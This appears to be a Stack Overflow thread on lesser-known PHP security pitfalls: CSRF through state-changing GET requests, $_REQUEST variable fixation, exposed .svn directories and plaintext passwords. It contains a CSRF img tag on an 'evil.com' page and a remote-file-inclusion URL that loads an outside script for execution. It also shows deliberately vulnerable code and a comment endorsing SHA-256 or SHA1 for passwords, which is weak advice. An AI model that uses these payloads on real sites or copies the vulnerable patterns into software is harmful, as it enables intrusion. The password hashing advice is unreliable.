# Common unknown PHP security pitfalls

Tags: php, security

I know questions like this have been asked a hundred of times, but mine is a little different.

I know about all the common and widely-known security issues like SQL injection, XSS etc. But what about issues that often appear but are not recognized most of the times or not judged as vulnerabilities? Are there any?

Comment: What does XSS have to do with PHP?

Comment: If they're "unknown" then they're probably not "common," and nobody's going to be able to tell you about things they've never heard of.

Comment: @Anon: Not escaping output can lead to XSS... That's what I meant.
@NSD: You're probably right, but I wanted to take the chance ;) There could be somebody walking around here who discovered something interesting etc.

Comment: @Anon: Just to provide a simple example of what @Franz means, consider a recently discovered vulnerability in Flash: Any generated JSONP feed that does not escape custom callbacks can be manipulated to serve a wide-open crossdomain.xml file (which Flash will honor).

Comment: "recently discovered" - that's the kind of thing I meant, too ;)

Answer (score 8, accepted):

One thing I've seen a lot that gets developed as a feature and not seen as a security hole until it's too late are state-changing GET requests. These can easily result in [cross-site request forgery](http://en.wikipedia.org/wiki/Cross-site_request_forgery). For example, your application could have a link to http://mysite.com/logout which logs users out. But a third party site can add code like this:

```
<!-- on evil.com site -->
<img src="http://mysite.com/logout">
```

Then when users load the page on evil.com, they are logged out of mysite.com!

The worst problems happen when sites implement an API using state-changing GET requests. For example, if I ran a social networking site with urls like site.com/addfriend, site.com/sendmessage, etc. and I gave out those urls to developers who were going to make applications for my site, the developers would have to deal with an API change when the security vulnerability was discovered.

Comment: Requiring POST for state-changing requests is definitely the right thing to do, but is not sufficient to stop XSRF.

Comment: Absolutely! I didn't mean to imply that POST was enough. There is info on preventing XSRF in the linked wikipedia article.

Answer (score 5):

1. Using `$_REQUEST` instead of `$_GET` or `$_POST`, which is a bad idea because `$_REQUEST` also contains cookies, and it opens the door for [Variable Fixation](http://kuza55.blogspot.com/2006/03/request-variable-fixation.html)
2. Not really PHP-specific, applies to all the interpreted languages: [visibility of .svn/.CVS directories](http://www.techcrunch.com/2009/09/23/basic-flaw-reveals-source-code-to-3300-popular-websites/)

Comment: I like the first one. What exactly is the problem of the second one?

Comment: As for #2, for .svn directories, this is why you svn export instead of svn checkout for QA/production builds.

Comment: @R. Bemrose: How do you switch between versions with svn export? Do you completely delete the whole source tree, and re-create it then?

Answer (score 3):

Here are a few that I've worked on:

- Storing passwords as plaintext in a DB

  - If your site is hacked, hackers have access to all of your users' passwords and emails. Consider how many users have the same password for their email as well as your site.
- Storing emails in the same table as your users

  - If a SQL injection attack gives a hacker access to your user table, one of the only pieces of valuable information is the email address. Keep it in a separate table to make it more difficult for the hacker.
  - If you don't intend on emailing the user, only store the hash of their email: a hacker that gets access to user emails can sell them to spammers.
- Even if you have a password-protected site, do the math as to how secure the password are. I had a friend whose site used a simple 5-digit number for passwords. I cracked it in 
  about an hour.
- If you're sending communications that have value (i.e.: you're performing an operation that uses a significant amount of resources: cpu, memory, etc.), always require a token from the user that's timestamped.

  - If a hacker finds that you have an operation that costs you $0.0001 every time it's hit, they can farm out a botnet to rack up charges on your name.
  - Require the user send a hash (a unique ID for the user, a timestamp, and a secret salt) along with a plaintext timestamp. The plaintext timestamp lets you validate that you didn't give them permission last Tuesday, the timestamp in the hash lets you validate that the has belongs with *that* message, the UID in the has ensures that the hacker didn't jack the request from someone else, and the secret salt in the hash ensures that they didn't generate it on their own.
- If you're writing a plugin system for an application, be wary of what you store in private variables. Check out this article I wrote on how to [lock it down](http://mattbasta.com/blog/post/secure-php-variables/).

Just a few ideas and things I've dealt with. Hope it helps!

Comment: Most (older) tutorials usually tell you to use MD5 to hash the passwords but keep in mind this is hardly secure, you need something much stronger like SHA-256 or at least SHA1.

Comment: And you need to hmac it, not simply hash : http://www.php.net/manual/en/function.hash-hmac.php

Answer (score 2):

I worked on a pile of junk once where fopen handlers were enabled as was "register globals." The includes looked like:

```
<?php
include $MY_BASE . '/includes/myLib.inc';
?>
```

What this allowed anyone to do is remotely execute any code they wanted. Behold:
http://exploitablehost.com/?MY_BASE=http://viagra.cheeper.com/myScript.txt%3f

PHP will fetch the text file over HTTP and execute it locally. Since Apache was running as root... well, you get the idea.

Comment: remote file include has been disabled by default for a long time.

Comment: Yes, but not on PHP4. Believe it or not, but their code wasn't compliant with the 5.x interpreters, so I patched the binary to disable fopen on include statements.

Answer (score 1):

Lack of procedures to protect against social engineering attacks? For example, an attacker calling an office and impersonating someone for the purpose of obtaining passwords.

Poor password-creation, distribution, and protection policy.

FTP account cracking can result in malicious code being uploaded to your site.

Weak/vulnerable third-party hosting servers can result in your site being compromised no matter how much time you spent making it secure.

Comment: I would be surprised if there was ANY way for a language or technology to prevent social engineering attacks :-)

Answer (score 1):

Here are some of the common pitfalls i have seen:

**1. Not escaping entities**

It's basic knowledge; ALL untrusted input (especially user input from forms) has to be sanitized before it is being output.

```
echo $_GET['username'];
```

**2. Not Escaping SQL input**

```
$query = "select * fromt able where id = {$_GET['id']}";
```

**3. Requiring and including files incorrectly**

```
include($_GET['filename']);
```

**4. Double escaping quotes**

If magic_quotes_gpc is true, then using addslahes will add one more slash
thereby adding two slashes in all.

Answer (score 0):

PHP has been around for more than 10 years and it matured a lot.

Beware of lax defaults in php.ini.

Answer (score 0):

Many of the posts are not specific to PHP. I am sure there are some language pitfalls but as you see in the posts it is very important to implement best practices in security (like filtering user input). A good start for secure web apps is [OWASP](http://www.owasp.org/index.php/Main_Page). And to be on topic: [Security Issues in PHP on OWASP](http://www.owasp.org/index.php/PHP_Top_5).

Cheers